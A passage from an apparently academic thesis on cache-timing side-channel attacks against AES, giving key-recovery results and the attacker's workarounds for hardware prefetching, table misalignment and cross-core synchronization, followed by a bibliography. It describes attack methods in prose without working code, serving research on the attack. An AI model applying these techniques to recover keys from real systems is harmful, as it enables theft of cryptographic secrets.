3 (A) Accesses from 8th and9th round of current encryp-tion. (B) Last round Ac-cesses.

Here, even if the data of next encryption isnot present, we can’t be sure of this situa-tion, so we simply consider these access asnext encryption access and along with nexttwo groups accesses, we consider is for newencryption.

4 (A) Accesses from 8th and9th round of current encryp-tion. (B) Few entries of lastround.

This scenario is also similar to previous sce-nario, and we will not have any problem inconsidering these accesses as new encryptionaccesses.

Table 10.1: Conflicting access resolution

48

2. We have varied number of accesses available to the attacker in each encryption,

both in the case of pre-fetching and no pre-fetching in perfectly synchronized

situation, where attacker exactly knows the start of encryption.

To get such results, we ran our attack on various number of encryptions and

plotted graph for each key byte under analysis vs the score it received during

the analysis. The complete algorithm is explained in Section 6.3.

Here, we will take the case of key byte 8 (k8). Below are two graphs showing

the plot in case of 1100 encryptions (left) and 1300 encryptions (right) for the

case of hardware pre-fetch enabled and considering whole 160 accesses chunk.

We can see that while in left, the peak although visible, is not very clear,

while in the right graph the clarity began to grow. If we increase the number

of encryptions, the difference will increase much more.

Figure 10.4: Differences in the peak for 1100 accesses

With the next graph, we can clearly see that as the number of accesses as

a bunch is available to attacker, the number of encryptions needed increases.

This is reasonable as well because with the increase in number of encryption

as a group, more cache lines are active now, which decreases the probability

of assurance about first round accesses.

In the case of hardware pre-fetching enabled, the number of accesses are defi-

nitely higher than that of its counterpart with no pre-fetching, and they also

49

Figure 10.5: Differences in the peak for 1300 encryptions

follow the same behaviour as that observed in the case of no pre-fetching.

Figure 10.6: Encryptions required (Perfectly Synch.

3. The above point assumes that attacker has perfectly synchronized data, with

start of encryption known to him/her. Here, we consider the case that if the

50

start of encryption is not known to attacker, rather attacker get continuous

chunk of accesses, the variation seems reasonable. With increasing the chunk

size the number of encryptions required will be more, as in each chunk more ac-

cesses are present and thus lesser probability. The synchronization is achieved

from the last table accesses, applying the same algorithm as that in given in

Table 10.1.

Figure 10.7: Encryptions required(synch. from last table accesses).

4. The above results are for first round result, where you could only retrieve 4

bits of every byte of the key. Second round attack is much more complex and

the results shows the same.

For second round attack, we are calculating results for four keys bytes simulta-

neously. Thus, we have 216 possible options, which can’t be plotted in a graph.

To gather the correct key sequence, we used the following simple technique.

We calculated the highest and 2nd highest score. When the difference of the

two scores are noticeably enough, we concluded the key combination with the

highest score as our key.

Till now, we were assuming ideal cases and the additional accesses are act-

ing as spurious accesses to our data decreasing the probability. We now will

compare each of the results(pre-fetching enabled and disabled) in both ideal

environment and noisy environment with some cache lines deliberately made

false. This corresponds to the real scenario, where few accesses may be missed.

51

Figure 10.8: Encryptions required for second round attack(prefetching disbaled).

Figure 10.9: Encryptions required for second round attack(prefetching enabled.

We can clearly see that the encryptions required for second round attack are

much more(order of thousands) than first round attack(order of hundreds).

5. Also, while getting actual accesses from cache, we have achieved very high

accuracy (more than 95%) with our set of tables.

52

For setting up this environment we created one big fat shared table simulating

actual AES tables. The victim process continuously accesses a random entry

in the table, thus loading it in cache. The attacker process is able to retrieve

more than 95% of accesses made by in one time quantum (which is around

31-32 accesses).

While applying this to actual AES tables, the accuracy drastically drops down

to about 70%. This will affect our results largely. Finding solution to this

problem is in scope of second stage.

53

Chapter 11

Countermeasures

While performing our attacks, there are many hurdles that we faced and crossed

with suitable tacts. Followings are the some of the major problems we faced and

their solutions.

11.1 Pre-fetching

Pre-fetcheing (specifically, hardware pre-fetching) is used in Intel machines now-

a-days to speed up the execution of the program by reducing the wait state. When

CPU requests for a memory location, it is first looked-up in the cache. In case of

cache miss, the data of that particular memory location along with the adjacent

memory locations in the same block (of the size of cache-block) is fetched in the

cache and then executed.

It is assumed that if a process is reading data from some part of the memory, it

is most likely to read data from nearby memory locations only (principle of tem-

poral locality). This is indeed very likely, because in general a process allocates

the data together and perform operations on it later. Also, in case of arrays etc,

they are accessed in contiguous location.

Extending the same concept, Hardware pre-fetcher also fetches the next to the

currently requested block of memory in cache, assuming that the next block of cache

is most likely to fetched in nearby future, thus reducing penalty during cache misses.

Modern processors support 4 types of hardware prefetchers for prefetching data.

There are 2 prefetchers associated with L1-data cache (also known as DCU) and 2

prefetchers associated with L2 cache. There is a Model Specific Register (MSR) on

every core with address of 0x1A4 that can be used to control these 4 prefetchers.

Bits 0-3 in this register can be used to either enable or disable these prefetchers.

Other bits of this MSR are reserved.

54

Figure 11.1: Intel MSR Prefetcher.

If any of the above bits are set to 1 on a core, then that particular prefetcher on

that core is disabled. Clearing that bit (setting it to 0) will enable the corresponding

prefetcher. Please note that this MSR is present in every core and changes made to

the MSR of a core will impact the prefetchers only in that core. If hyper-threading

is enabled, both the threads share the same MSR.

11.1.1 Issues

In our scenario, this feature adversely affects our attack to a great extent. Two

kinds of problems arises now. Lets discuss them step by step.

1. Victim performing the AES when accesses a table entry, not only those par-

ticular 16 entries (No. of entries in one cache block ) is being fetched, but also

the next 16 entries are fetched. Thus attacker, when trying to gather infor-

mation about cache lines being accessed by victim, will get more cache lines

as compared to the actual access. This will increase noise in our experiments.

2. The same problem occurs on attacker side as well. Attacker, when trying

to gather information about cache lines accessed, does so by first accessing

that cache line and calculating the time required to access that line. In the

55

case of hardware pre-fetching enabled, this means that when attacker is trying

to measure time for a particular cache line, the next memory block is also

brought up in the memory. Attacker thus clearly missed the opportunity to

gather information about whether the next line is accessed by victim or not.

11.1.2 Workaround

To remove the effects of pre-fetching, one way is to disable the hardware pre-fetching

in the processor. The steps to disable pre-fetching is described in appendix. This

however, is not a realistic approach because we may never get the chance to disable

hardware pre-fetching in real scenario. Also, newer architectures does not support

disabling pre-fetching.

Pre-fetching is an essential step in increasing the performance of the system, so

this step is not at all justified.

We thus propose the following approach(es) to curb the pre-fetching effects.

• In place of accessing the cache lines in sequential order one after the another,

access the cache lines such that there is a difference of atleast two lines be-

tween two cache accesses. This will remove the effect of hardware pre-fetching

because it only fetches the next line in memory.

However, there is another problem. Accesses made in this fashion can be

detected by more sophisticated modern day pre-fetchers. They looks for a

stride during the memory accesses. That is, if we try to access the cache lines

with of gap of 2 (for ex. I accessed 6th line, 8th line, 10th line), it instructs

the Operating System to pre-fetch the next line (12th line, in this case).

In order nullify such effects, we further propose the following. Access the cache

lines in some random definite order so that the effects of both hardware as well

as software pre-fetcher is removed.

Here, we have used a generated numbers in the range of 0-31 using the princi-

ples of cyclic group, by taking the generator to be 2, and taking prime modulus

as 37.

So, at each step the number generated can be represented by this equation:

n = ((2i) mod 37) ∗ 2

, where i is the ith iteration of this sequence.

The series generated is: 2, 4, 8, 16, .....

56

We can clearly see that all the numbers are generated in the range of 0-31

and they are generated pretty much in a random way for naive software pre-

fetchers to detect. Each time we access twice of the generated numbers to

generate even accesses only.

This will clearly help us in gathering the cache access patterns.

• There is now only one problem left with this approach. What will happen for

the odd cache lines. Every time accessing the even cache lines, and ignoring

the odd ones will lead to missing out the opportunity to detect those. For that

we propose the following.

In one cycle access the even lines, in another cycle access the odd lines, i.e.

access even and odd lines alternatively. This will definitely miss out the oppor-

tunity to detect all the accesses in a particular iteration, but it will allow us to

not miss the information for the other lines. The probability to get the correct

key is now reduced, but with more number of encryptions during the online

phase of the attack, will help us in retrieving the key with high accuracy.

11.2 Look-up tables Misalignment

Misalignment of lookup tables was another problem that we faced in initial stages

but it was only reported with some of the operating systems.

In ideal case, size of each cache lines are 64 bytes. One table is of 1KB. So, if we

consider the scenario where table’s entry start from the beginning of the cache lines,

then there will be no misalignment. Since the size of each loopup table entries are 4

bytes so there should be exactly 16 entries in each cache lines for no misalignment.

But, In some versions of OS we found that these table entries are not occupying

their places from the beginning of the cache lines hence creating the problem of

misalignment. Results are obvious, if the cache line x has to be accessed, then x+ 1

is being noticed.

Solution to the above problem is to write a program to check for the exactly next

entry in the case of the misalignment as it will be increased by 1.

11.3 Synchronization

Achieving synchronization in our espionage infrastructure was another challenge

that we handle in iterative manner. The first problem we faced was to develop an

efficient algorithm to communicate between two processes residing in different cores.

57

We first implemented a two way signalling methodology. But drawback with this

approach is that it was taking too much time to send and receive signals thus giving

victim enough time to perform multiple AES encryptions.

This problem was later solved by employing one way signalling mechanism. In

this approach, we were updating a shared variable between two processes and then

only process 2 sends signal to process 1. It was efficient in respect to time. Later

for further improving our algorithm, we added some delays that we learnt in section

8.2 as δ1 and δ2.

58

Bibliography

[1] Openssl. https://www.openssl.org.

[2] Wikipedia advanced encryption standard. http://en.wikipedia.org/wiki/

Advanced_Encryption_Standard. Modified: 2015-05-07.

[3] Onur Acıicmez and Cetin Kaya Koc. Trace-driven cache attacks on aes (short

paper). In Information and Communications Security, pages 112–121. Springer,

2006.

[4] Vibhor Agrawal. Cache based side channel attacks. Technical Report 38-41,

Department of Computer Science & Engineering, IIT-Bombay, India, 2014.

[5] Daniel J Bernstein. Cache-timing attacks on aes, 2005.

[6] Joan Daemen and Vincent Rijmen. The design of Rijndael: AES-the advanced

encryption standard. Springer, 2002.

[7] Tromer Eran, Dag Arne Osvik, and Adi Shamir. Efficient cache attacks on aes,

and countermeasures. Journal of Cryptology, 23(1):37–71, 2010.

[8] Irazoqui G., Mehmet S., Thomas E., and Berk S. Wait a minute! a fast,

cross-vm attack on aes. In Research in Attacks, Intrusions and Defenses, pages

299–319. Springer, 2014.

[9] Jyoti Gajrani, Pooja Mazumdar, Sampreet Sharma, and Bernard Menezes.

Challenges in implementing cache-based side channel attacks on modern proces-

sors. In 27th International Conference on VLSI Design and 13th International

Conference on Embedded Systems. IEEE, 2014.

[10] Apecechea G.I. Fine grain cross-vm attacks on xen and vmware are possible!.

IACR Cryptology ePrint Archive, page 248, 2014.

[11] David Gullasch, Endre Bangerter, and Stephan Krenn. Cache games–bringing

access-based cache attacks on aes to practice. In Security and Privacy (SP),

2011 IEEE Symposium on, pages 490–505. IEEE, 2011.

59

[12] Hu and W.-M. Lattice scheduling and covert channels. Proceedings of the

IEEE Symposium on Security and Privacy (Washington, DC, USA, 1992), SP

’92, IEEE Computer Society:pp51, 1992.

[13] Bonneau J. and Mironov I. Cache-collision timing attacks against aes. In

Cryptographic Hardware and Embedded Systems-CHES 2006 Volume 4249 of

Springe LNCS, pages 201–215. Springer, 2006.

[14] Neve M. and Seifert J.-P. Advances on access-driven cache attacks on aes. In

Selected Areas in Cryptography, pages 147–162. Springer, 2007.

[15] Weiβ M., Heinz B., and Stumpf F. A cache timing attack on aes in virtualization

environments. In Financial Cryptography and Data Security, pages 314–328.

Springer, 2012.

[16] Dag Arne Osvik, Adi Shamir, and Eran Tromer. Cache attacks and counter-

measures: the case of aes. In Topics in Cryptology–CT-RSA 2006, pages 1–20.

Springer, 2006.

[17] Tsunoo Y., T. Saito, T. Suzaki, and Shigeri. M. cryptanalysis of des imple-

mented on computers with cache. In Proc. of CHES 2003, Springer LNCS,

pages 62–76. Springer-Verlag, 2003.

[18] Yuval Yarom and Katrina E Falkner. Flush+ reload: a high resolution, low

noise, l3 cache side-channel attack. IACR Cryptology ePrint Archive, 2013:448,

2013.

Cache Based Side Channel Attacks On AESrgiri8/files/RPG_BTP.pdf"Cache Based Side Channel Attacks on...

Documents

Transcript of Cache Based Side Channel Attacks On AESrgiri8/files/RPG_BTP.pdf"Cache Based Side Channel Attacks on...